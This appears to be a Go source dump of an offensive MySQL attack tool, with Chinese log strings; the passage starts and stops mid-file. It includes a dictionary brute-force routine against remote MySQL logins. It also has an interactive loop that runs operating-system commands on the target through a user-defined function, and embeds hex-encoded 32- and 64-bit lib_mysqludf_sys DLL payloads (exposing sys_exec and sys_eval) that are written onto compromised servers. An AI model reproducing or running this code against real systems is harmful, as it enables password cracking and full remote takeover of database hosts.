 90 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
 91 | 		cmd, _ = reader.ReadString('\n')
 92 | 		cmd = strings.TrimRight(cmd, "\r\n")
 93 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 94 | 			break
 95 | 		}
 96 | 		aa := fmt.Sprintf("%s%s\");", udfcmd, cmd)
 97 | 		Info(aa)
 98 | 		result, err := MysqlCMD(aa, conn)
 99 | 		if err != nil {
100 | 			Info("循环执行命令报错")
101 | 		}
102 | 		for i, _ := range result {
103 | 			for _, w := range result[i] {
104 | 				fmt.Println(w)
105 | 			}
106 | 		}
107 | 	}
108 | }
109 | 


--------------------------------------------------------------------------------
/pac/mysql_connect.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | 	_ "github.com/go-sql-driver/mysql"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | func MysqlConnect(Ruser string, Rhost string, PWD string, Rport string) (err error, conn *sql.DB, sign bool) {
12 | 	Info("账号密码正确但无法连接可能是因为目标没有开启远程连接")
13 | 	dsn := fmt.Sprintf("%s:%s@tcp(%s:%s)/information_schema?charset=gbk&parseTime=True", Ruser, PWD, Rhost, Rport)
14 | 	conn, err = sql.Open("mysql", dsn)
15 | 	if err != nil {
16 | 		Err(err)
17 | 		return nil, nil, false
18 | 	}
19 | 	err = conn.Ping()
20 | 	if err != nil {
21 | 		Err(err)
22 | 		return nil, nil, false
23 | 	}
24 | 	fmt.Println("连接数据库成功！")
25 | 	sign = true
26 | 	return nil, conn, sign
27 | }
28 | 
29 | func MysqlCrack(Rhost string, Rport string) {
30 | 	Info("开始爆破,请稍等.....")
31 | 	sign = false
32 | 	for _, user := range Userdict["mysql"] {
33 | 		for _, pass := range Passwords {
34 | 			pass = strings.Replace(pass, "{user}", user, -1)
35 | 
36 | 			_, _, sign := MysqlConnect(user, Rhost, pass, Rport)
37 | 			if sign == true {
38 | 				Success(fmt.Sprintf("账号密码为：%s:%s", user, pass))
39 | 				os.Exit(0)
40 | 			} else {
41 | 				fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass))
42 | 			}
43 | 		}
44 | 	}
45 | }
46 | 


--------------------------------------------------------------------------------
/pac/mysql_udf.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"database/sql"
  5 | 	"fmt"
  6 | 	"os"
  7 | 	"strconv"
  8 | 	"strings"
  9 | )
 10 | 
 11 | var Win32dll = "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A24000000000000004D477BD0092615830926158309261583005E86830B261583005E808308261583005E968307261583005E91830B2615832EE06E830A2615830926148325261583005E9C8308261583005E878308261583005E8483082615835269636809261583000000000000000000000000000000000000000000000000504500004C0103004AFE9F5A0000000000000000E00002210B010900001000000010000000600000607C0000007000000080000000000010001000000002000005000000000000000500000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007C83000008020000B4820000C800000000800000B402000000000000000000000000000000000000848500001000000000000000000000000000000000000000000000000000000000000000000000002C7E00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E0555058310000000000100000007000000010000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000140000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D090208B92BCF11B11CEEA24F550000560C000000220000260000A8FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015E5DFB77FBC38B44240C1A6A071611108BF8183218FF63DB6F1CA45FC7011E1200210883380175128B40040DF6776F0700750A1004C6000132C0C3530ABF1DF68D3C3053A454082D08FF30FF15FFF6EE776C885985C075085614C601011BC8568D71018A11FD6FDFFE4184D275F98B54142BCE890A32558BEC8B4D0C833902B7D860BF5374148B7D10915C5453EB4CBF9DBDDF8B417D740F1B707C1BEBE5836004DBB1FFB7001A0C8B48048B008D4401025072A0594C08DFC8D7B5891678113006A44CEB6C57BEB7B2B85F5E5DA30421740833DBB63FF6A8591353568B742410D878534602DB85DB5BB6460851C78D5C4257E8240B75EEEEBFE01400C604070008FF70041E0553B1DB1B921A22C418535720030054090F09B7086A995B0F98599954CF2D343713B8F4540B1EDEB60D818403552251519D35DFFED6FEDF576800F762D66A018945FC068BF08B4560DD7FF70CC606004533FF595939387471683CC071C6FEDFDA9C12260C3BC7745B506A04FF75FC149073E1EDD7A9FD48533AFC8D48911040B963DBFF2BC18BD88D043B505630F8268C5330D8AD8DBD5F03FE570E940DE57DF8463FE6364C2066BA5B1810A4803E0059169EB0FF741A8BC6C64437FF00594D1489C906987BEBD86F183E5F205EC9C3EED7B235DCBAF37D574708C45030087BDBDACDC9C26A4078C710548D4601B9E07E614251724F0856FF31CF6BAFDD9DB694C66AFF8DC32082F63A58B0B6030D092C23005F7CC36E57036C6A081D1290AC0AA88365FC2F6C2F2C2D4592D0EB071B408F65E8C70BBFD66E42FEFF000D1FEDC25E3BFFDB17B60D08209A02F3C3E90806F58BFF56688000002D8C6D675880985608845AA3BDE0FEBB062358045485F675054DAA83260076FBB7DB4508C36F08ED09ACC704240607FF0B4C113637598D71FFCF9C0BBF77DFC9750E39056B107E3CFF7310830B01FBEEC6BB8B0910548B098F57890A23480F85D47D618CBBAD641718068B79040838071B76EDEEBB1E50EB184AA705B8E61768B0B030D8E803A83C0957C1D6BBAEB5D6A1E7E9E2573CA12F4C6A6FF777C3025EFD096A1FEE76EB3CAA10C80475ED7BEFC0C7051F281A70E027071BDFF79D5CB520BC04B81B6A5635B952EB782B7339B2E3696FF7DEFD7340393D155C741C68062809AC43DB6B85850D9E1034252316FFE666F862F154B201DC0801592CC2B1A1DB78049DDFDBF62413D90FD4FC83F80266B16F6CB0D2595BFFA0584B77783BB5783106350F8487C71996EE4CD3543BF81810897D82EFC796BE35FAC87251833F8AF36A7C398587B4F10774E9FFC8D60F7C89C5DB9BB5D955F85615441B474DED5BE38EF88A394D1003D00874B48909437AA36D020C1AD3F8EBA71C3162CC5A64442E386161FB0A58064C32FC19503F1BDF720443375BC9C20CC710FB02231FB2288B2EF28B5D081CAE0FDB9B54E433C95CFC7D2008016C2DC6C23BF15A393A4417E4D61BFE7FAFAE3BF0740583FE02752E1910D03BC1E7166EB8ED57565FD03B5EE40003937B703B67115A039614168012376C7D270A8227FEA0246420575062B30D661327002F527F8DF61AD2061153F76A037543B067BB614F34032168742E2C0D2C3CEC257FEB1B71EC5A09706A7C6FAAE05051597C64825D900EADF62FFA8A19066B8F91B6C72AE490C396EC1640E134A9FF3B246ABB41C1F17926547DBC550C0D381E33BC05BC595D382281EC2832F7869F365F212043211C895E2118891D05F78EC243143C21A2AA210C668C186C5FFBDA3806252C0620080605DD2DCDD20425002D7FFC9C8F7AB6B1F6143095562407042831D6FEDB7F0807348B85E0FCA0AA701DDBB5B395011C1920241318092B18476A565F201CB360C32C9F7B8985D8320A04DC03B557E01B243468DEDFD1F7D8D360CE2879D40A2C833D208DBDC3DA00F923685B1B300BDFAF67F534C97F23401EC25F6A4849918F144A50152E9DF458AAF8A29C10F3EB67611C7E052C37D4598FEDED8321B9273551E0F5EE3BDC0ABF03E4507F4B8417185BDB7E600BCE1CDC142CD6E288B154B609E01B14F413160A4BDB313DDCDBFFDC84676CC859D94E1E07F7D81BF076BBB7C00359485D1656B8BC18BE04A3638B6F2AF83BC673080753025073D85F60835A3BFE72F15F5E25206C6053C820CC006F35B4DD452BB84D5A346627040B85BF2B5E6E413C03C1813850E45FEFA5ECFFFB33D2B90B011C48180F94C28BC25DC33FB702BF35E34831C80FB74114AE057106C1A55B6C33578C081817761BFFFF2FF1D7487BF972098B580803D93BFB720A4283C0283BD67270CA36B5E86AE55DC38F6AFEF0CD71F7A970040B056418005083EC080DB7C670082F316C33C576F0852F06DF64A31A89B90968555DB7F081F0B2091C6B04F555972DD12C937D1350195C083B04E1C26F2724C1E81FF715E0018FEFB6532B034F230059948BE55DC3621DDB49A301CA3DAFC0FAE99525242631CCFF29343232B61058054C50AC2CB41E97AF12B60D56096B27D7616B20CFB0FBEF2AE4E03160031F73D9665B9A6C038D2BE0FAFC046BA039F13CB4FC8A0D6C120C7D0DC395C3C1619C965154147FE41F3E783124F020140BDAC40E5643B25D53EC1068F885626DF4F888C9BF4EE640BB25EEA0398466820D85C33149DB9F0A359A04EB605675F869639FC1F6448B7598751F1033F0071476E6CA20189D271CB4F6EE6FEDF4330C113BF77507BE4F59EB0B85F30A7B047EA10AC1E0100BF0CE00F7D6076C840D1E045E5F01C33F5C05646464646064686C1405766474B000003FF4C20E034B0F20185F4E6F20FFFFB7FF617267756D656E7473096C6C6F77656420287564663A206C69625F6DCCFD6DF77973716C0D5F73085F696E666F293918DFB6FF8F2076657273696F6E20302E01341F45787065F6DBDBDD637447657861076C79201A65207374723F5BDB5AFB672074791B75726171217258C00E602B7477911FD86F030B3F8672206E616D48DBB1B71F436F756C246E6F74C4636113203058B76D186D2779AF72F1483FDA4D943F2003121071051BF29D5860214707D0604D0D0B0F81CB074ED961DD9703AB17CC2708A77527ECC00FD81F0A3B034FC0A07B851F03240328C1556583A200C5889251CA22D877BDB119BF44FF000F5565A3AA00A8AA9251645455C95532AAAAFFF61D455C0410020157616974466F00FC06C07253886C654F626A07C07F6B99145669727475616C417603E0F6370D536574456E76126F6EC000BC6DBF5661726961622B4118437265F76DEB6E94546806640D47264375727222CD12F65B502A636573734914266E03E083135469636BDE6E6BB1F6B6FD5175657279500366846D616E371667EF1B00FD0144697367374CFDB7EDED6962727879436192731A4973446562756767EDEE6DAD266A686546A4556E6840B1B7B7B7643164457846707469AF46696C4A6D295B6119B41254DE64AEB0176D0DD8114990B9EDD61A0A6B409D6D70876547C25A73CD517F77555122B4ED6E591B5C537973186DEEC3C2EB2E39417373650975697CDB15DA434C7D5F687E396D5F2EDFFEDEBE5F616D7367087869740B646A753A5F666469EC4217B076260A639A5F64FD6CADB91F5F686F6F6B131459725FF802700148D15FDB9CEB0249730A330A6C21D6F0BD82539C2A64D46E640893050B130F651E6B5B7BC25F2C723456ED6D1C182FF6D69A700A035F706F522947E1DDBE6E106468756C5EB92A6BCB92BD9B1B2CA806E0B6D86E6EC57265250866112E827BDB5673749C637079082439EDCD5C6B32C06E4D0FD7ED1F5AC36F7319663A1F5F4370705831C75E3B8474BC6D343F001817FFFFFFFF3D193C1C1B161E55142D16270815270F11115F10130A070D2E17090705160C1E7FFBFFFF080A0B160918181505061B050C10060717062105110F061421110B08E4FBDFB62B22052A111D0D18532D483806000776FBDBE5080C09330A090B0C051007061612EEDFFEED0E0B34150B18160D3D0542C205121E14066930FFD8DDFF110C0E1D4D0517230D0C3224080B4506F0DE041004F03B0A6EFF2C01043808041C1C0204003E4C016DFF21FD05004AFE9F5A8FE00002210B0109080C634F7AD60C1213D616A300200E10C10A01630B02AB3362B7EE6107006003040233351EEED9C0CE34100706C02633D6EDDB7620AC22033C144002B0021C5759DD0050520143C8C8BA65B1214200A7B82F06DB5D182EB4787407EA0B900C5BFA90CDB742602E72647D610861C90E76C508FB0A00C700A1DB66BB77402E26300304301BECDB943D001A27C04F73726300EB11C0061B40731C4F78C2C2A365761F01030002ED7760497B27421BA023030000EDD8D152127C53030400000000000080FF00000000000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92A0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B472000001F35083C708FF96F0720000958A074708C074DC89F95748F2AE55FF96F472000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF87200008DBE00F0FFFFBB0010000050546A045357FFD58D871702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E9AD98FFFF0000004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030001010220010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000056020000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C7472757374496E666F20786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E7633223E0D0A202020203C73656375726974793E0D0A2020202020203C72657175657374656450726976696C656765733E0D0A20202020202020203C726571756573746564457865637574696F6E4C6576656C206C6576656C3D226173496E766F6B6572222075694163636573733D2266616C7365223E3C2F726571756573746564457865637574696F6E4C6576656C3E0D0A2020202020203C2F72657175657374656450726976696C656765733E0D0A202020203C2F73656375726974793E0D0A20203C2F7472757374496E666F3E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564339302E435254222076657273696F6E3D22392E302E32313032322E38222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E504100000000000000000000000010830000F08200000000000000000000000000001D83000008830000000000000000000000000000000000000000000028830000368300004683000056830000648300000000000072830000000000004B45524E454C33322E444C4C004D5356435239302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004AFE9F5A0000000058840000010000001200000012000000A4830000EC8300003484000021100000A312000000100000A4120000A3120000A0120000CC110000A31200009811000086110000A31200009811000076100000A3120000431000002E1100001A110000A91000006D84000083840000A0840000BB840000C7840000DA840000EB840000F484000004850000128500001B8500002B8500003985000041850000508500005D850000658500007485000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E69740000000000700000100000006D3C683E6C3E0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000"
 12 | var Win64dll = "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000677CBFDA231DD189231DD189231DD18904DBBF89211DD18904DBBC892A1DD18904DBAA89261DD189231DD0890F1DD18904DBAC89211DD18904DBA089221DD18904DBAB89221DD18904DBA989221DD18952696368231DD189000000000000000000000000000000005045000064860300A727A15A0000000000000000F00022200B020800002000000010000000800000109F000000900000000000100000000000100000000200000400000000000000050002000000000000C000000010000000000000020000000000100000000000001000000000000000001000000000000010000000000000000000001000000098B2000008020000B0B10000E800000000B00000B00100000050000050010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000800000001000000000000000040000000000000000000000000000800000E0555058310000000000200000009000000012000000040000000000000000000000000000400000E02E727372630000000010000000B000000006000000160000000000000000000000000000400000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E393100555058210D240209E1E421439D3BDFB7DE7400000F0F0000002A0000490000D41DE9FEFF833A007450488B05A421000049890009A24008CD4973D20A9F109C1899CD9F34272096280FB70593666D83FDB7410B30B001C332C0C3CC00C215CC92C9BA810034716A6FEBCC16E46C096A471853FDBF1FA4631C0FB605591688401E41C7011E00FFED6DD62B8B63BF01750F3F42088338007506C64B26EBDC01017B4E2D632B05B9E4B228CE25227ED20CD26F1F28152AB001C3F66D7BC2BF83EC38344A43895C243084B7FFF6DBD90B09FF15C71F2B4885C04C8BD87512104C24DF6EAEB9608707202DC4388E897C242873EDCDFD33C048C7C1FF0033FBF2AE1C120976D9B75B1AF7D122E901890B2DCC00BE6FEB166F28E3026E404848DEDA7FDB29F938D87459488D0D40EE4E0E813832983DE4C1EB81403281480A9EE4435E4F81503281543281563261F37D4FB0018C48804028C34C49467607744E61DEED584917E49260680A703C6527CD18782056C740045CF8BF33B64342188B48048B008D4C010239BD1E77D27D8BD947107543706D8045EC1BE936130309884370900A00B69DEE10C8980A18BC0CB3C6B00E07103FBCB37DDB0F49A585C974066F5D17B7086D21CF93CF047424ADA3B9772D7110448B6949E2FA02C2EDDFBA52E2CE0212498D5C3001E83F0FFCE85CD7FDDD5FEBCB418B03C60430D2470D5734B70C58D7E22D0822D34313167BB75BCE2618007CA01CFF56677C84842F7198F4CF16C64373870D087C8C03D6E4240F79561E541E511E7292939C4E1E4B1E481E63C2425E3E1E1FCF2784EE87C71F1DA0981F4C89C68685EE44241824580F6C59897486BB86DB76381764BDB900D34C18284CB0DB7E302D4D8BF146E8E7B901EE9B6DC1EC04E00DDA4533ED4488670BEEF69B4FF04C39290F8413050673F215FDCFB8B9169125AC1C088BE8747B418D5508E1C9B6B13AC0E6CC177C7466A04B6640FA50669047FC3F42858E1B0B9529328D7936CE6F7D61C16C304375CD8CC74803C8F56636B724D470143E51C5BA08E1D9B68D39CC1CEB13225975AD886CDBB6F050EB258BC77004CD1930DDFE9CDB803E30E2154874229245FFB176D8827811FEF5887EDD4D174EBE5A0EEBC18424805EC606E71ADA0001380C4C38F12A10F8386C04C6F0A0581A87E792317FD3DC5CD8D6D09D58747A28F2023F73B773DF3E448D48406E41B80010B3748BD1F10DF7C7ED33C9AB441A5356104CEFA2DBE6B66C02C8D8154E1B8D54B94C350AEDE98D054A75890BA3B16E3B2DBC3133D2C7D0208925183BDF19B7B3BAD2C80DF2199D30AC581E29EB081433C0922FB384F13BE0064CEB0033C029001BB0DFB65538EC024510FF10C9196600FB6F7F6C900390483B0D89293F751148C1C11066F7DDDD6FDFB87502F3DAC1C910E9150AECCC405361203B8B7D1B5801A05FDCD25B0BFBEEF7F685DBC905112FD005020675098D430185BB76EFB6205B42C703D59B0D3C48B406634136670B1C5805B12006615BD85BC3CF55D27F6CC7C7C376FC608468E140DCFBF1C2C63831E83BE141BDD20F8503EE46BB7408075EE428073C0F8E0D8DE6B61B6E2BC58ED3105FDCFD3E76FB0FB12D602E0A741EF290B9E803C91D19BFDB36931D4275E841320783F802740FB9EF6DC3B31FB70ECA0208E2ED0D2F2E338E740FD2111912F874491412FC18DADC0B1FD958F847DF72165F1803B6BB2D701E4AD0C9EB081573ED12ECF6BEDBCF2774192D06429BD72D0698FBFB66D833DB891DB80E871DB906716FC7FEB59806E5413BD5DDE26541042530BB7DBBBD002C0978081E8BF3F048B93D883072B0B7920A63C7741AD64618D7D29B2F1C6B75E3EB037BF5A79A5ED6390C950CDAEB3FEA1F9F7DB7F08E8F080644892D312D1BC485C0678FED62771A15E5DE0DD6181ABE7FDDBBEEC7050725024585F67507B404BB833D14DDC96E73068B212A0B2D5C6F11DEDD264FE3029CF12C66012D3A273E9E9EBE10C58F38D240E468EC98717A60DCE91748C3B14D22190F6C20483A5ADBF308505851F0DD05BBEE77DF3D041F208915D12695D275133915D709ED7F38C3750B5A17C61E83FA017405040ADD6BE00275338931D39D08A3B71B0D34C84E20C574134AC68B07863DB9D7A64BFC1616E0C9016B3C1A0EDC83FFB092EBDA1535AB311BC11BDB5B0BD80C430C1DC817084D7BF787755C0B1841FFD385FF88FF03753970F79D75094A08AEEB8D1CA51E36EC648B171028ADEB06D8192ECC298ADC25F3008BC3659E8793708B218B8BF8B59D9E2A4055BF15EAA3894D7AFAB61B01018B080724B0D67D5D902DD9C2302F5E7D0AB1485825FF4DDB960C1E92387D2EDA02F101D7136FA3F875056C0CFCFA7D918844A4FD258B036983EB2F9E8E090CEFC6F852A1899E2681EC880068CD760DBFFE73153F156705B8C648F25845B7390CB8283D1F2C586170C339DEF61624EB754148B73DC6364238004044230430090E662FCF40280578254703055C73874C1C51494E7D4BB1077F4BF0EB222B8093447BDD837D738D0E83C00812D13E8D67DB7B642A059B240D20902F9C5BA25B701C2A7214097BC009CC3E1E666C926724766E833572DBFF0B70DC7A142F482C38B0BB2493827B8EF083D2396A14019B15650CCB36DC9255B624C80A271B83D76C1854BA6A234E336B1784F781C4ACA041592947A626231C0FD8CF53188186D9EF0D68295A4A148A8EF8ECECCDD64427CB1366EB75B908674B32D21DEA902D3A1C1128106464200A8B83AF334463971BCB36E418C323DB83A238243D05F62809993959B611402BDC678C90C136DE1BC3017F37320296247F15F4F6120D6276D81BC00383E8013C2075643F289C8D3D53041A787F4B8D1D4C068D13A08491790EC372B3326129A9EF4F137F2344720CC96681394D5A75FCB7C3FF174863513C813C0A5045E1137C0A180B020F94C063E343029F4C63413CFEC9B4EBED8D7ED24C03C1413C4014450458064525FFC25F6A4AB10018741F8B510B3BD2720A8B4108ED6FF8DB03C209D072104183C113C128453BCB72E16FC796B05D1CC1C3CF4CC1267AF7446992E1DA85DCBD1F4C2BC15FEAFB5ABED0140CCD0F3A24C1E81F600D2CFEF7D083E001EB02584FD644AB360196EBCAC0B66C3008EEC18B01A7FFAA128D3CC77627252205CC11CE78DCA606CB113F75463DA70FF0DD4603241B471EB801000000277C29847F3FE520000081BFF83C3DFC32A2DF2D992B7DC7F83074149D6FA3D00E7F5DC6268B2DC285586B212430BC6286B6489934E10AB9B4C856E04671D849460BB50E731C0EB110D9BE10A8D813FE6A4CB84C33DBCEB8FF00856037BA1623E9B8338975DDE016B1DF744D44D89C1D39B705DBDD8449F7D3093720D2FBDC4B4646463605DEE0E2E4B24746465E505A11000055C9A8AA298064547FB017D8069017303007D04E6F206172FFFFDFFE67756D656E7473096C6C6F77656420287564663A206C69625F6D79730BF6B7DD716C0D5F73085F696E666F29411C80EDFF232076657273696F6E20302E0134EDEDEE17A178706563744B657861076C79201A6DBB7DFB652073747243672074791B2070766175D8299B6D21724F2F7477996D60010B1F438EF6F603FB72206E616D4C436F756C246E6F74CCE8B66D3B63611320186D27796372FF850740310106023532023001240D0024F6FFB7FFD407001FC408001A740B15640C0010540B000B340A0004822776BBDCFE1918090018C40F13740E640B093427B763D4ED046217D41E5E3F1903241AEDBACF2C5007390F2A07801ABBDC6E8367165B16743711640C340B7BD85B770442130C390C01118350118B9B6DF705530133871C03E4001D5D90ED60430E057B743F09BAEEB0D80401072F67079403A06077DBC10701462F462B1074092F0DB6D94E3416033B01000715BB0BB6BD971574062F64F7DF21000884DDB640AE043439741F00BF20EEECEDB6140629034C341F0BA903E1C2DEBE240F05C305340A13234BD36D9B6E23431E14C45F0F470A75B713760554094B01098909A2071E7DE572BB1F1E742F12640D34870142B71582BB2E1311CF0C03CA96DD0E01380F387427005124A3AAFEC10246DDCD5D20D266D4FF555516C900178FA02A1B003011764BD56C039180BFA007E0126DD79DDD03703407F803680B0013026A76FBBA8603540B14021814170B581590FB2F07D9EEECF60A150310340727030034075BD5B9DD7003E0336F0724B3CC755DD7750B30074203AC0B9007F5B61B94DB03C03233920C1903C8BA05A0EB0B10074F8BE80B508375AFEB077303444707990BA0B65DD77507E503280BF0073A1C033C0038B7EB0B5007F71CA70B77B63BDB8B191D2F2007381DCB40071DAC7B5D83036C8307D30B601E9DED5EB3039B7C5F07C11E3BE0D0AE3BDB07031F3B1007D6039C33CA1255954A005525A3AAA8AA9251645455C9D09BA0887C0402C4FF16360157616974466F7253AC7F2B40FC6C654F626ABD14566972747561F63703C46C419A0D536574456E76126DBF01E26F6EE45661726961622B41EB2E40BC18437265B8546806640DF65BF76D47264375727222502A636573734914E283CD1226135469636BB6FD6E03026E6B517565727950036684DEDBB1F66D616E3716657218446973676FDBDBCF374C6962727879436192731A52746C633BB76D0970A2722D2C7874124CBDB5ADFD6F6F6B7570463EC26916B2747279DFB5078B17CD556E77E47E4973446562736F6BED75676763A7A56583E11DFEB6B77268616E64457883704046696CA56C85C58719F19319DAB61254176D65151153DAF6586B39352B537973176DFA81E87517454173426509A3DBFE434388A0895F616D73675FCC6990B3850BBF5F5F435F73708B6966285F7E267CDB766F5F64116F035F706F6922430B76DB2663DA5F64CE280009626B31142D325F7A13C417840B5F7B50705B6C735F330A6C212205DB5ACCD82A58096E73ED6BC982130FD76D643ED6BAD6DE756C343F15416D170CDEA3E0020AB52689A3B565C933A196063BC16DB15B0772652508661115080D5BA1739C29709F73149BB5ADB93932AE6E074D0F85D7BADBC56F736A663A70105E3B84ED70705831747B6D343FDF15F4C700F08C21180800E264860600A76EFB0FE327A15AE6F00022200B020808120CB07744B314132E0010000005CF1E6C9B02020433050002088000C302F663146D160100022E063AF76C650F0A50394330908DE8DB88223C1460E2D880D4BD0118020183703AACBB024B00303A011E4644A42B2E1054822D3BD810901200DC00B3DBC63B6F602E7264A76108550B53597761DD000C03162740022E26291B61F600D805100C22273616ECECC02E702850EB27244FD820FC007273726300136027B3C7013226650942FCA664B0702728421B4036C08D6D05CA7212D3060000000000009000FF0048894C240848895424104C8944241880FA010F854502000053565755488D35CDF0FFFF488DBE0080FFFF5731DB31C94883CDFFE85000000001DB7402F3C38B1E4883EEFC11DB8A16F3C3488D042F83F9058A1076214883FDFC771B83E9048B104883C00483E9048917488D7F0473EF83C1048A10741048FFC0881783E9018A10488D7F0175F0F3C3FC415BEB0848FFC6881748FFC78A1601DB750A8B1E4883EEFC11DB8A1672E68D410141FFD311C001DB750A8B1E4883EEFC11DB8A1673EB83E8037217C1E0080FB6D209D048FFC683F0FF0F843A0000004863E88D410141FFD311C941FFD311C9751889C183C00241FFD311C901DB75088B1E4883EEFC11DB73ED4881FD00F3FFFF11C1E83AFFFFFFEB835E4889F7B900120000B2004889FBEB2C8A074883C7013C80720A3C8F7706807FFE0F74062CE83C0177233817751F8B072500FFFFFF0FC829F801D8AB4883E9048A074883C70148FFC975D9EB0548FFC975BE4883EC28488DBE007000008B0709C0744F8B5F04488D8C30B0A100004801F34883C708FF96ECA1000048958A0748FFC708C074D74889F94889FAFFC8F2AE4889E9FF96F4A100004809C074094889034883C308EBD64883C4285D5F5E5B31C0C34883C4284883C704488D5EFC31C08A0748FFC709C074233CEF77114801C3488B03480FC84801F0488903EBE0240FC1E010668B074883C702EBE1488BAEFCA10000488DBE00F0FFFFBB00100000504989E141B8040000004889DA4889F94883EC20FFD5488D871702000080207F8060287F4C8D4C24204D8B014889DA4889F9FFD54883C4285D5F5E5B488D4424806A004839C475F94883EC804C8B442418488B542410488B4C2408E91F79FFFF000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005CB0000054010000E404000000000000586000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D22616D64363422207